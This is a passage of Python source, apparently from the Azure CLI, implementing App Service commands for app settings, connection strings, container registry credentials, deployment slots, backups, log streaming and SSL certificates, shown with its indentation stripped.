slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
for setting_name in setting_names:
app_settings.properties.pop(setting_name, None)
if slot_cfg_names.app_setting_names and setting_name in slot_cfg_names.app_setting_names:
slot_cfg_names.app_setting_names.remove(setting_name)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
result = _generic_settings_operation(resource_group_name, name,
'update_application_settings',
app_settings.properties, slot, client)
return _build_app_settings_output(result.properties, slot_cfg_names.app_setting_names)
def _build_app_settings_output(app_settings, slot_cfg_names):
slot_cfg_names = slot_cfg_names or []
return [{'name': p,
'value': app_settings[p],
'slotSetting': p in slot_cfg_names} for p in _mask_creds_related_appsettings(app_settings)]
def update_connection_strings(resource_group_name, name, connection_string_type,
settings=None, slot=None, slot_settings=None):
from azure.mgmt.web.models import ConnStringValueTypePair
if not settings and not slot_settings:
raise CLIError('Usage Error: --settings |--slot-settings')
settings = settings or []
slot_settings = slot_settings or []
conn_strings = _generic_site_operation(resource_group_name, name,
'list_connection_strings', slot)
for name_value in settings + slot_settings:
# split at the first '=', connection string should not have '=' in the name
conn_string_name, value = name_value.split('=', 1)
if value[0] in ["'", '"']: # strip away the quots used as separators
value = value[1:-1]
conn_strings.properties[conn_string_name] = ConnStringValueTypePair(value,
connection_string_type)
client = web_client_factory()
result = _generic_settings_operation(resource_group_name, name,
'update_connection_strings',
conn_strings.properties, slot, client)
if slot_settings:
new_slot_setting_names = [n.split('=', 1)[0] for n in slot_settings]
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.connection_string_names = slot_cfg_names.connection_string_names or []
slot_cfg_names.connection_string_names += new_slot_setting_names
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def delete_connection_strings(resource_group_name, name, setting_names, slot=None):
conn_strings = _generic_site_operation(resource_group_name, name,
'list_connection_strings', slot)
client = web_client_factory()
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
for setting_name in setting_names:
conn_strings.properties.pop(setting_name, None)
if slot_cfg_names.connection_string_names and setting_name in slot_cfg_names.connection_string_names:
slot_cfg_names.connection_string_names.remove(setting_name)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return _generic_settings_operation(resource_group_name, name,
'update_connection_strings',
conn_strings.properties, slot, client)
CONTAINER_APPSETTING_NAMES = ['DOCKER_REGISTRY_SERVER_URL', 'DOCKER_REGISTRY_SERVER_USERNAME',
'DOCKER_REGISTRY_SERVER_PASSWORD', "WEBSITES_ENABLE_APP_SERVICE_STORAGE"]
APPSETTINGS_TO_MASK = ['DOCKER_REGISTRY_SERVER_PASSWORD']
def update_container_settings(resource_group_name, name, docker_registry_server_url=None,
docker_custom_image_name=None, docker_registry_server_user=None,
websites_enable_app_service_storage=None, docker_registry_server_password=None,
slot=None):
settings = []
if docker_registry_server_url is not None:
settings.append('DOCKER_REGISTRY_SERVER_URL=' + docker_registry_server_url)
if (not docker_registry_server_user and not docker_registry_server_password and
docker_registry_server_url and '.azurecr.io' in docker_registry_server_url):
logger.warning('No credential was provided to access Azure Container Registry. Trying to look up...')
parsed = urlparse(docker_registry_server_url)
registry_name = (parsed.netloc if parsed.scheme else parsed.path).split('.')[0]
try:
docker_registry_server_user, docker_registry_server_password = _get_acr_cred(registry_name)
except Exception as ex: # pylint: disable=broad-except
logger.warning("Retrieving credentials failed with an exception:'%s'", ex) # consider throw if needed
if docker_registry_server_user is not None:
settings.append('DOCKER_REGISTRY_SERVER_USERNAME=' + docker_registry_server_user)
if docker_registry_server_password is not None:
settings.append('DOCKER_REGISTRY_SERVER_PASSWORD=' + docker_registry_server_password)
if docker_custom_image_name is not None:
_add_linux_fx_version(resource_group_name, name, docker_custom_image_name, slot)
if websites_enable_app_service_storage:
settings.append('WEBSITES_ENABLE_APP_SERVICE_STORAGE=' + websites_enable_app_service_storage)
if docker_registry_server_user or docker_registry_server_password or docker_registry_server_url or websites_enable_app_service_storage: # pylint: disable=line-too-long
update_app_settings(resource_group_name, name, settings, slot)
settings = get_app_settings(resource_group_name, name, slot)
return _mask_creds_related_appsettings(_filter_for_container_settings(resource_group_name, name, settings))
def _get_acr_cred(registry_name):
from azure.mgmt.containerregistry import ContainerRegistryManagementClient
from azure.cli.core.commands.parameters import get_resources_in_subscription
client = get_mgmt_service_client(ContainerRegistryManagementClient).registries
result = get_resources_in_subscription('Microsoft.ContainerRegistry/registries')
result = [item for item in result if item.name.lower() == registry_name]
if not result or len(result) > 1:
raise CLIError("No resource or more than one were found with name '{}'.".format(registry_name))
resource_group_name = parse_resource_id(result[0].id)['resource_group']
registry = client.get(resource_group_name, registry_name)
if registry.admin_user_enabled: # pylint: disable=no-member
cred = client.list_credentials(resource_group_name, registry_name)
return cred.username, cred.passwords[0].value
raise CLIError("Failed to retrieve container registry credentails. Please either provide the "
"credentail or run 'az acr update -n {} --admin-enabled true' to enable "
"admin first.".format(registry_name))
def delete_container_settings(resource_group_name, name, slot=None):
_delete_linux_fx_version(resource_group_name, name, slot)
delete_app_settings(resource_group_name, name, CONTAINER_APPSETTING_NAMES, slot)
def show_container_settings(resource_group_name, name, slot=None):
settings = get_app_settings(resource_group_name, name, slot)
return _mask_creds_related_appsettings(_filter_for_container_settings(resource_group_name, name, settings, slot))
def _filter_for_container_settings(resource_group_name, name, settings, slot=None):
result = [x for x in settings if x['name'] in CONTAINER_APPSETTING_NAMES]
fx_version = _get_linux_fx_version(resource_group_name, name, slot).strip()
if fx_version:
added_image_name = {'name': 'DOCKER_CUSTOM_IMAGE_NAME',
'value': fx_version}
result.append(added_image_name)
return result
# TODO: remove this when #3660(service tracking issue) is resolved
def _mask_creds_related_appsettings(settings):
for x in [x1 for x1 in settings if x1 in APPSETTINGS_TO_MASK]:
settings[x] = None
return settings
def add_hostname(resource_group_name, webapp_name, hostname, slot=None):
client = web_client_factory()
webapp = client.web_apps.get(resource_group_name, webapp_name)
binding = HostNameBinding(webapp.location, site_name=webapp.name)
if slot is None:
return client.web_apps.create_or_update_host_name_binding(resource_group_name, webapp.name, hostname, binding)
return client.web_apps.create_or_update_host_name_binding_slot(resource_group_name, webapp.name, hostname, binding,
slot)
def delete_hostname(resource_group_name, webapp_name, hostname, slot=None):
client = web_client_factory()
if slot is None:
return client.web_apps.delete_host_name_binding(resource_group_name, webapp_name, hostname)
return client.web_apps.delete_host_name_binding_slot(resource_group_name, webapp_name, slot, hostname)
def list_hostnames(resource_group_name, webapp_name, slot=None):
result = list(_generic_site_operation(resource_group_name, webapp_name,
'list_host_name_bindings', slot))
for r in result:
r.name = r.name.split('/')[-1]
return result
def get_external_ip(resource_group_name, webapp_name):
# logics here are ported from portal
client = web_client_factory()
webapp_name = client.web_apps.get(resource_group_name, webapp_name)
if webapp_name.hosting_environment_profile:
address = client.app_service_environments.list_vips(
resource_group_name, webapp_name.hosting_environment_profile.name)
if address.internal_ip_address:
ip_address = address.internal_ip_address
else:
vip = next((s for s in webapp_name.host_name_ssl_states if s.ssl_state == SslState.ip_based_enabled), None)
ip_address = vip.virtual_ip if vip else address.service_ip_address
else:
ip_address = _resolve_hostname_through_dns(webapp_name.default_host_name)
return {'ip': ip_address}
def _resolve_hostname_through_dns(hostname):
import socket
return socket.gethostbyname(hostname)
def create_webapp_slot(resource_group_name, webapp, slot, configuration_source=None):
client = web_client_factory()
site = client.web_apps.get(resource_group_name, webapp)
location = site.location
slot_def = Site(server_farm_id=site.server_farm_id, location=location)
clone_from_prod = None
slot_def.site_config = SiteConfig()
poller = client.web_apps.create_or_update_slot(resource_group_name, webapp, slot_def, slot)
result = LongRunningOperation()(poller)
if configuration_source:
clone_from_prod = configuration_source.lower() == webapp.lower()
site_config = get_site_configs(
resource_group_name, webapp, None if clone_from_prod else configuration_source)
_generic_site_operation(resource_group_name, webapp,
'update_configuration', slot, site_config)
# slot create doesn't clone over the app-settings and connection-strings, so we do it here
# also make sure slot settings don't get propagated.
if configuration_source:
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, webapp)
src_slot = None if clone_from_prod else configuration_source
app_settings = _generic_site_operation(resource_group_name, webapp,
'list_application_settings',
src_slot)
for a in slot_cfg_names.app_setting_names or []:
app_settings.properties.pop(a, None)
connection_strings = _generic_site_operation(resource_group_name, webapp,
'list_connection_strings',
src_slot)
for a in slot_cfg_names.connection_string_names or []:
connection_strings.properties.pop(a, None)
_generic_settings_operation(resource_group_name, webapp,
'update_application_settings',
app_settings.properties, slot, client)
_generic_settings_operation(resource_group_name, webapp,
'update_connection_strings',
connection_strings.properties, slot, client)
result.name = result.name.split('/')[-1]
return result
def config_source_control(resource_group_name, name, repo_url, repository_type='git', branch=None, # pylint: disable=too-many-locals
manual_integration=None, git_token=None, slot=None, cd_app_type=None,
app_working_dir=None, nodejs_task_runner=None, python_framework=None,
python_version=None, cd_account_create=None, cd_project_url=None, test=None,
slot_swap=None, private_repo_username=None, private_repo_password=None):
client = web_client_factory()
location = _get_location_from_webapp(client, resource_group_name, name)
if cd_project_url:
# Add default values
cd_app_type = 'AspNet' if cd_app_type is None else cd_app_type
python_framework = 'Django' if python_framework is None else python_framework
python_version = 'Python 3.5.3 x86' if python_version is None else python_version
webapp_list = None if test is None else list_webapp(resource_group_name)
vsts_provider = VstsContinuousDeliveryProvider()
cd_app_type_details = {
'cd_app_type': cd_app_type,
'app_working_dir': app_working_dir,
'nodejs_task_runner': nodejs_task_runner,
'python_framework': python_framework,
'python_version': python_version
}
status = vsts_provider.setup_continuous_delivery(resource_group_name, name, repo_url,
branch, git_token, slot_swap, cd_app_type_details,
cd_project_url, cd_account_create, location, test,
private_repo_username, private_repo_password, webapp_list)
logger.warning(status.status_message)
return status
else:
non_vsts_params = [cd_app_type, app_working_dir, nodejs_task_runner, python_framework,
python_version, cd_account_create, test, slot_swap]
if any(non_vsts_params):
raise CLIError('Following parameters are of no use when cd_project_url is None: ' +
'cd_app_type, app_working_dir, nodejs_task_runner, python_framework,' +
'python_version, cd_account_create, test, slot_swap')
from azure.mgmt.web.models import SiteSourceControl, SourceControl
if git_token:
sc = SourceControl(location, source_control_name='GitHub', token=git_token)
client.update_source_control('GitHub', sc)
source_control = SiteSourceControl(location, repo_url=repo_url, branch=branch,
is_manual_integration=manual_integration,
is_mercurial=(repository_type != 'git'))
# SCC config can fail if previous commands caused SCMSite shutdown, so retry here.
for i in range(5):
try:
poller = _generic_site_operation(resource_group_name, name,
'create_or_update_source_control',
slot, source_control)
return LongRunningOperation()(poller)
except Exception as ex: # pylint: disable=broad-except
import re
import time
ex = ex_handler_factory(no_throw=True)(ex)
# for non server errors(50x), just throw; otherwise retry 4 times
if i == 4 or not re.findall(r'\(50\d\)', str(ex)):
raise
logger.warning('retrying %s/4', i + 1)
time.sleep(5) # retry in a moment
def update_git_token(git_token=None):
'''
Update source control token cached in Azure app service. If no token is provided,
the command will clean up existing token.
'''
client = web_client_factory()
from azure.mgmt.web.models import SourceControl
sc = SourceControl('not-really-needed', source_control_name='GitHub', token=git_token or '')
return client.update_source_control('GitHub', sc)
def show_source_control(resource_group_name, name, slot=None):
return _generic_site_operation(resource_group_name, name, 'get_source_control', slot)
def delete_source_control(resource_group_name, name, slot=None):
return _generic_site_operation(resource_group_name, name, 'delete_source_control', slot)
def enable_local_git(resource_group_name, name, slot=None):
client = web_client_factory()
location = _get_location_from_webapp(client, resource_group_name, name)
site_config = SiteConfigResource(location)
site_config.scm_type = 'LocalGit'
if slot is None:
client.web_apps.create_or_update_configuration(resource_group_name, name, site_config)
else:
client.web_apps.create_or_update_configuration_slot(resource_group_name, name,
site_config, slot)
return {'url': _get_local_git_url(client, resource_group_name, name, slot)}
def sync_site_repo(resource_group_name, name, slot=None):
try:
return _generic_site_operation(resource_group_name, name, 'sync_repository', slot)
except CloudError as ex: # Because of bad spec, sdk throws on 200. We capture it here
if ex.status_code not in [200, 204]:
raise ex
def list_app_service_plans(resource_group_name=None):
client = web_client_factory()
if resource_group_name is None:
plans = list(client.app_service_plans.list())
else:
plans = list(client.app_service_plans.list_by_resource_group(resource_group_name))
for plan in plans:
# prune a few useless fields
del plan.app_service_plan_name
del plan.geo_region
del plan.subscription
return plans
def _linux_sku_check(sku):
tier = _get_sku_name(sku)
if tier in ['BASIC', 'STANDARD']:
return
format_string = 'usage error: {0} is not a valid sku for linux plan, please use one of the following: {1}'
raise CLIError(format_string.format(sku, 'B1, B2, B3, S1, S2, S3'))
def create_app_service_plan(resource_group_name, name, is_linux, sku='B1', number_of_workers=None,
location=None):
client = web_client_factory()
sku = _normalize_sku(sku)
if location is None:
location = _get_location_from_resource_group(resource_group_name)
if is_linux:
_linux_sku_check(sku)
# the api is odd on parameter naming, have to live with it for now
sku_def = SkuDescription(tier=_get_sku_name(sku), name=sku, capacity=number_of_workers)
plan_def = AppServicePlan(location, app_service_plan_name=name,
sku=sku_def, reserved=(is_linux or None))
return client.app_service_plans.create_or_update(resource_group_name, name, plan_def)
def update_app_service_plan(instance, sku=None, number_of_workers=None,
admin_site_name=None):
sku_def = instance.sku
if sku is not None:
sku = _normalize_sku(sku)
sku_def.tier = _get_sku_name(sku)
sku_def.name = sku
if number_of_workers is not None:
sku_def.capacity = number_of_workers
instance.sku = sku_def
if admin_site_name is not None:
instance.admin_site_name = admin_site_name
return instance
def show_backup_configuration(resource_group_name, webapp_name, slot=None):
try:
return _generic_site_operation(resource_group_name, webapp_name,
'get_backup_configuration', slot)
except Exception: # pylint: disable=broad-except
raise CLIError('Backup configuration not found')
def list_backups(resource_group_name, webapp_name, slot=None):
return _generic_site_operation(resource_group_name, webapp_name, 'list_backups',
slot)
def create_backup(resource_group_name, webapp_name, storage_account_url,
db_name=None, db_type=None,
db_connection_string=None, backup_name=None, slot=None):
client = web_client_factory()
if backup_name and backup_name.lower().endswith('.zip'):
backup_name = backup_name[:-4]
location = _get_location_from_webapp(client, resource_group_name, webapp_name)
db_setting = _create_db_setting(db_name, db_type, db_connection_string)
backup_request = BackupRequest(location, backup_request_name=backup_name,
storage_account_url=storage_account_url, databases=db_setting)
if slot:
return client.web_apps.backup_slot(resource_group_name, webapp_name, backup_request, slot)
return client.web_apps.backup(resource_group_name, webapp_name, backup_request)
def update_backup_schedule(resource_group_name, webapp_name, storage_account_url=None,
frequency=None, keep_at_least_one_backup=None,
retention_period_in_days=None, db_name=None,
db_connection_string=None, db_type=None, slot=None):
client = web_client_factory()
location = _get_location_from_webapp(client, resource_group_name, webapp_name)
configuration = None
try:
configuration = _generic_site_operation(resource_group_name, webapp_name,
'get_backup_configuration', slot)
except CloudError:
# No configuration set yet
if not all([storage_account_url, frequency, retention_period_in_days,
keep_at_least_one_backup]):
raise CLIError('No backup configuration found. A configuration must be created. ' +
'Usage: --container-url URL --frequency TIME --retention DAYS ' +
'--retain-one TRUE/FALSE')
# If arguments were not specified, use the values in the current backup schedule
if storage_account_url is None:
storage_account_url = configuration.storage_account_url
if retention_period_in_days is None:
retention_period_in_days = configuration.backup_schedule.retention_period_in_days
if keep_at_least_one_backup is None:
keep_at_least_one_backup = configuration.backup_schedule.keep_at_least_one_backup
else:
keep_at_least_one_backup = keep_at_least_one_backup.lower() == 'true'
if frequency:
# Parse schedule frequency
frequency_num, frequency_unit = _parse_frequency(frequency)
else:
frequency_num = configuration.backup_schedule.frequency_interval
frequency_unit = configuration.backup_schedule.frequency_unit
if configuration and configuration.databases:
db = configuration.databases[0]
db_type = db_type or db.database_type
db_name = db_name or db.name
db_connection_string = db_connection_string or db.connection_string
db_setting = _create_db_setting(db_name, db_type, db_connection_string)
backup_schedule = BackupSchedule(frequency_num, frequency_unit.name,
keep_at_least_one_backup, retention_period_in_days)
backup_request = BackupRequest(location, backup_schedule=backup_schedule, enabled=True,
storage_account_url=storage_account_url, databases=db_setting)
return _generic_site_operation(resource_group_name, webapp_name, 'update_backup_configuration',
slot, backup_request)
def restore_backup(resource_group_name, webapp_name, storage_account_url, backup_name,
db_name=None, db_type=None, db_connection_string=None,
target_name=None, overwrite=None, ignore_hostname_conflict=None, slot=None):
client = web_client_factory()
storage_blob_name = backup_name
webapp_info = client.web_apps.get(resource_group_name, webapp_name)
app_service_plan = webapp_info.server_farm_id.split('/')[-1]
if not storage_blob_name.lower().endswith('.zip'):
storage_blob_name += '.zip'
location = _get_location_from_webapp(client, resource_group_name, webapp_name)
db_setting = _create_db_setting(db_name, db_type, db_connection_string)
restore_request = RestoreRequest(location, storage_account_url=storage_account_url,
blob_name=storage_blob_name, overwrite=overwrite,
site_name=target_name, databases=db_setting,
ignore_conflicting_host_names=ignore_hostname_conflict,
app_service_plan=app_service_plan)
if slot:
return client.web_apps.restore_slot(resource_group_name, webapp_name, 0, restore_request, slot)
return client.web_apps.restore(resource_group_name, webapp_name, 0, restore_request)
def _create_db_setting(db_name, db_type, db_connection_string):
if all([db_name, db_type, db_connection_string]):
return [DatabaseBackupSetting(db_type, db_name, connection_string=db_connection_string)]
elif any([db_name, db_type, db_connection_string]):
raise CLIError('usage error: --db-name NAME --db-type TYPE --db-connection-string STRING')
def _parse_frequency(frequency):
unit_part = frequency.lower()[-1]
if unit_part == 'd':
frequency_unit = FrequencyUnit.day
elif unit_part == 'h':
frequency_unit = FrequencyUnit.hour
else:
raise CLIError('Frequency must end with d or h for "day" or "hour"')
try:
frequency_num = int(frequency[:-1])
except ValueError:
raise CLIError('Frequency must start with a number')
if frequency_num < 0:
raise CLIError('Frequency must be positive')
return frequency_num, frequency_unit
def _normalize_sku(sku):
sku = sku.upper()
if sku == 'FREE':
return 'F1'
elif sku == 'SHARED':
return 'D1'
return sku
def _get_sku_name(tier):
tier = tier.upper()
if tier == 'F1':
return 'FREE'
elif tier == 'D1':
return 'SHARED'
elif tier in ['B1', 'B2', 'B3']:
return 'BASIC'
elif tier in ['S1', 'S2', 'S3']:
return 'STANDARD'
elif tier in ['P1', 'P2', 'P3', 'P1V2', 'P2V2', 'P3V2']:
return 'PREMIUM'
else:
raise CLIError("Invalid sku(pricing tier), please refer to command help for valid values")
def _get_location_from_resource_group(resource_group_name):
from azure.mgmt.resource import ResourceManagementClient
client = get_mgmt_service_client(ResourceManagementClient)
group = client.resource_groups.get(resource_group_name)
return group.location
def _get_location_from_webapp(client, resource_group_name, webapp):
webapp = client.web_apps.get(resource_group_name, webapp)
return webapp.location
def _get_local_git_url(client, resource_group_name, name, slot=None):
user = client.get_publishing_user()
result = _generic_site_operation(resource_group_name, name, 'get_source_control', slot)
parsed = urlparse(result.repo_url)
return '{}://{}@{}/{}.git'.format(parsed.scheme, user.publishing_user_name,
parsed.netloc, name)
def _get_scm_url(resource_group_name, name, slot=None):
from azure.mgmt.web.models import HostType
webapp = show_webapp(resource_group_name, name, slot=slot)
for host in webapp.host_name_ssl_states or []:
if host.host_type == HostType.repository:
return "https://{}".format(host.name)
# this should not happen, but throw anyway
raise ValueError('Failed to retrieve Scm Uri')
def set_deployment_user(user_name, password=None):
'''
Update deployment credentials.(Note, all webapps in your subscription will be impacted)
'''
client = web_client_factory()
user = User()
user.publishing_user_name = user_name
if password is None:
try:
password = prompt_pass(msg='Password: ', confirm=True)
except NoTTYException:
raise CLIError('Please specify both username and password in non-interactive mode.')
user.publishing_password = password
return client.update_publishing_user(user)
def list_publish_profiles(resource_group_name, name, slot=None):
import xmltodict
content = _generic_site_operation(resource_group_name, name,
'list_publishing_profile_xml_with_secrets', slot)
full_xml = ''
for f in content:
full_xml += f.decode()
profiles = xmltodict.parse(full_xml, xml_attribs=True)['publishData']['publishProfile']
converted = []
for profile in profiles:
new = {}
for key in profile:
# strip the leading '@' xmltodict put in for attributes
new[key.lstrip('@')] = profile[key]
converted.append(new)
return converted
def enable_cd(resource_group_name, name, enable, slot=None):
settings = []
settings.append("DOCKER_ENABLE_CI=" + enable)
update_app_settings(resource_group_name, name, settings, slot)
return show_container_cd_url(resource_group_name, name, slot)
def show_container_cd_url(resource_group_name, name, slot=None):
settings = get_app_settings(resource_group_name, name, slot)
docker_enabled = False
for setting in settings:
if setting['name'] == 'DOCKER_ENABLE_CI' and setting['value'] == 'true':
docker_enabled = True
break
cd_settings = {}
cd_settings['DOCKER_ENABLE_CI'] = docker_enabled
if docker_enabled:
profiles = list_publish_profiles(resource_group_name, name, slot)
for profile in profiles:
if profile['publishMethod'] == 'MSDeploy':
scmUrl = profile['publishUrl'].replace(":443", "")
cd_url = 'https://' + profile['userName'] + ':' + profile['userPWD'] + '@' + scmUrl + '/docker/hook'
cd_settings['CI_CD_URL'] = cd_url
break
else:
cd_settings['CI_CD_URL'] = ''
return cd_settings
def view_in_browser(resource_group_name, name, slot=None, logs=False):
site = _generic_site_operation(resource_group_name, name, 'get', slot)
url = site.default_host_name
ssl_host = next((h for h in site.host_name_ssl_states
if h.ssl_state != SslState.disabled), None)
url = ('https' if ssl_host else 'http') + '://' + url
_open_page_in_browser(url)
if logs:
get_streaming_log(resource_group_name, name, provider=None, slot=slot)
def _open_page_in_browser(url):
import sys
if sys.platform.lower() == 'darwin':
# handle 2 things:
# a. On OSX sierra, 'python -m webbrowser -t <url>' emits out "execution error: <url> doesn't
# understand the "open location" message"
# b. Python 2.x can't sniff out the default browser
import subprocess
subprocess.Popen(['open', url])
else:
import webbrowser
webbrowser.open(url, new=2) # 2 means: open in a new tab, if possible
# TODO: expose new blob suport
def config_diagnostics(resource_group_name, name, level=None,
application_logging=None, web_server_logging=None,
docker_container_logging=None, detailed_error_messages=None,
failed_request_tracing=None, slot=None):
from azure.mgmt.web.models import (FileSystemApplicationLogsConfig, ApplicationLogsConfig,
SiteLogsConfig, HttpLogsConfig, FileSystemHttpLogsConfig,
EnabledConfig)
client = web_client_factory()
# TODO: ensure we call get_site only once
site = client.web_apps.get(resource_group_name, name)
location = site.location
application_logs = None
if application_logging is not None:
if not application_logging:
level = 'Off'
elif level is None:
level = 'Error'
fs_log = FileSystemApplicationLogsConfig(level)
application_logs = ApplicationLogsConfig(fs_log)
http_logs = None
server_logging_option = web_server_logging or docker_container_logging
if server_logging_option:
# TODO: az blob storage log config currently not in use, will be impelemented later.
# Tracked as Issue: #4764 on Github
filesystem_log_config = None
turned_on = server_logging_option != 'off'
if server_logging_option in ['filesystem', 'off']:
# 100 mb max log size, retention lasts 3 days. Yes we hard code it, portal does too
filesystem_log_config = FileSystemHttpLogsConfig(100, 3, enabled=turned_on)
http_logs = HttpLogsConfig(filesystem_log_config, None)
detailed_error_messages_logs = (None if detailed_error_messages is None
else EnabledConfig(detailed_error_messages))
failed_request_tracing_logs = (None if failed_request_tracing is None
else EnabledConfig(failed_request_tracing))
site_log_config = SiteLogsConfig(location,
application_logs=application_logs,
http_logs=http_logs,
failed_requests_tracing=failed_request_tracing_logs,
detailed_error_messages=detailed_error_messages_logs)
return _generic_site_operation(resource_group_name, name, 'update_diagnostic_logs_config',
slot, site_log_config)
def show_diagnostic_settings(resource_group_name, name, slot=None):
return _generic_site_operation(resource_group_name, name, 'get_diagnostic_logs_configuration', slot)
def config_slot_auto_swap(resource_group_name, webapp, slot, auto_swap_slot=None, disable=None):
client = web_client_factory()
site_config = client.web_apps.get_configuration_slot(resource_group_name, webapp, slot)
site_config.auto_swap_slot_name = '' if disable else (auto_swap_slot or 'production')
return client.web_apps.update_configuration_slot(resource_group_name, webapp, site_config, slot)
def list_slots(resource_group_name, webapp):
client = web_client_factory()
slots = list(client.web_apps.list_slots(resource_group_name, webapp))
for slot in slots:
slot.name = slot.name.split('/')[-1]
setattr(slot, 'app_service_plan', parse_resource_id(slot.server_farm_id)['name'])
del slot.server_farm_id
return slots
def swap_slot(resource_group_name, webapp, slot, target_slot=None, action='swap'):
client = web_client_factory()
if action == 'swap':
if target_slot is None:
poller = client.web_apps.swap_slot_with_production(resource_group_name,
webapp, slot, True)
else:
poller = client.web_apps.swap_slot_slot(resource_group_name, webapp,
slot, target_slot, True)
return poller
elif action == 'preview':
if target_slot is None:
result = client.web_apps.apply_slot_config_to_production(resource_group_name,
webapp, slot, True)
else:
result = client.web_apps.apply_slot_configuration_slot(resource_group_name, webapp,
slot, target_slot, True)
return result
else: # reset
# we will reset both source slot and target slot
if target_slot is None:
client.web_apps.reset_production_slot_config(resource_group_name, webapp)
else:
client.web_apps.reset_slot_configuration_slot(resource_group_name, webapp, target_slot)
client.web_apps.reset_slot_configuration_slot(resource_group_name, webapp, slot)
return None
def delete_slot(resource_group_name, webapp, slot):
client = web_client_factory()
# TODO: once swagger finalized, expose other parameters like: delete_all_slots, etc...
client.web_apps.delete_slot(resource_group_name, webapp, slot)
def set_traffic_routing(resource_group_name, name, distribution):
client = web_client_factory()
site = client.web_apps.get(resource_group_name, name)
configs = get_site_configs(resource_group_name, name)
host_name_suffix = '.' + site.default_host_name.split('.', 1)[1]
configs.experiments.ramp_up_rules = []
for r in distribution:
slot, percentage = r.split('=')
configs.experiments.ramp_up_rules.append(RampUpRule(action_host_name=slot + host_name_suffix,
reroute_percentage=float(percentage),
name=slot))
_generic_site_operation(resource_group_name, name, 'update_configuration', None, configs)
return configs.experiments.ramp_up_rules
def show_traffic_routing(resource_group_name, name):
configs = get_site_configs(resource_group_name, name)
return configs.experiments.ramp_up_rules
def clear_traffic_routing(resource_group_name, name):
set_traffic_routing(resource_group_name, name, [])
def get_streaming_log(resource_group_name, name, provider=None, slot=None):
scm_url = _get_scm_url(resource_group_name, name, slot)
streaming_url = scm_url + '/logstream'
import time
if provider:
streaming_url += ('/' + provider.lstrip('/'))
client = web_client_factory()
user, password = _get_site_credential(client, resource_group_name, name)
t = threading.Thread(target=_get_log, args=(streaming_url, user, password))
t.daemon = True
t.start()
while True:
time.sleep(100) # so that ctrl+c can stop the command
def download_historical_logs(resource_group_name, name, log_file=None, slot=None):
scm_url = _get_scm_url(resource_group_name, name, slot)
url = scm_url.rstrip('/') + '/dump'
client = web_client_factory()
user_name, password = _get_site_credential(client, resource_group_name, name)
_get_log(url, user_name, password, log_file)
logger.warning('Downloaded logs to %s', log_file)
def _get_site_credential(client, resource_group_name, name):
creds = client.web_apps.list_publishing_credentials(resource_group_name, name)
creds = creds.result()
return (creds.publishing_user_name, creds.publishing_password)
def _get_log(url, user_name, password, log_file=None):
import sys
import certifi
import urllib3
try:
import urllib3.contrib.pyopenssl
urllib3.contrib.pyopenssl.inject_into_urllib3()
except ImportError:
pass
std_encoding = sys.stdout.encoding
http = urllib3.PoolManager(cert_reqs='CERT_REQUIRED', ca_certs=certifi.where())
headers = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
r = http.request(
'GET',
url,
headers=headers,
preload_content=False
)
if r.status != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
url, r.status, r.reason))
if log_file: # download logs
with open(log_file, 'wb') as f:
while True:
data = r.read(1024)
if not data:
break
f.write(data)
else: # streaming
for chunk in r.stream():
if chunk:
# Extra encode() and decode for stdout which does not surpport 'utf-8'
print(chunk.decode(encoding='utf-8', errors='replace')
.encode(std_encoding, errors='replace')
.decode(std_encoding, errors='replace'), end='') # each line of log has CRLF.
r.release_conn()
def upload_ssl_cert(resource_group_name, name, certificate_password, certificate_file):
client = web_client_factory()
webapp = _generic_site_operation(resource_group_name, name, 'get')
cert_resource_group_name = parse_resource_id(webapp.server_farm_id)['resource_group']
cert_file = open(certificate_file, 'rb')
cert_contents = cert_file.read()
hosting_environment_profile_param = webapp.hosting_environment_profile
if hosting_environment_profile_param is None:
hosting_environment_profile_param = ""
thumb_print = _get_cert(certificate_password, certificate_file)
cert_name = _generate_cert_name(thumb_print, hosting_environment_profile_param,
webapp.location, cert_resource_group_name)
cert = Certificate(password=certificate_password, pfx_blob=cert_contents,
location=webapp.location)
return client.certificates.create_or_update(cert_resource_group_name, cert_name, cert)
def _generate_cert_name(thumb_print, hosting_environment, location, resource_group_name):
return "%s_%s_%s_%s" % (thumb_print, hosting_environment, location, resource_group_name)
def _get_cert(certificate_password, certificate_file):
''' Decrypts the .pfx file '''
p12 = OpenSSL.crypto.load_pkcs12(open(certificate_file, 'rb').read(), certificate_password)
cert = p12.get_certificate()
digest_algorithm = 'sha1'
thumbprint = cert.digest(digest_algorithm).decode("utf-8").replace(':', '')
return thumbprint
def list_ssl_certs(resource_group_name):
client = web_client_factory()
return client.certificates.list_by_resource_group(resource_group_name)
def delete_ssl_cert(resource_group_name, certificate_thumbprint):
client = web_client_factory()
webapp_certs = client.certificates.list_by_resource_group(resource_group_name)
for webapp_cert in webapp_certs:
if webapp_cert.thumbprint == certificate_thumbprint:
return client.certificates.delete(resource_group_name, webapp_cert.name)
raise CLIError("Certificate for thumbprint '{}' not found".format(certificate_thumbprint))
def _update_host_name_ssl_state(resource_group_name, webapp_name, location,
host_name, ssl_state, thumbprint, slot=None):
updated_webapp = Site(host_name_ssl_states=[HostNameSslState(name=host_name,
ssl_state=ssl_state,
thumbprint=thumbprint,
to_update=True)],
location=location)
name = '{}({})'.format(webapp_name, slot) if slot else webapp_name
return _generic_site_operation(resource_group_name, name, 'create_or_update',
slot, updated_webapp)
def _update_ssl_binding(resource_group_name, name, certificate_thumbprint, ssl_type, slot=None):
client = web_client_factory()
webapp = client.web_apps.get(resource_group_name, name)
cert_resource_group_name = parse_resource_id(webapp.server_farm_id)['resource_group']
webapp_certs = client.certificates.list_by_resource_group(cert_resource_group_name)
for webapp_cert in webapp_certs:
if webapp_cert.thumbprint == certificate_thumbprint:
if len(webapp_cert.host_names) == 1 and not webapp_cert.host_names[0].startswith('*'):
return _update_host_name_ssl_state(resource_group_name, name, webapp.location,
webapp_cert.host_names[0], ssl_type,
certificate_thumbprint, slot)
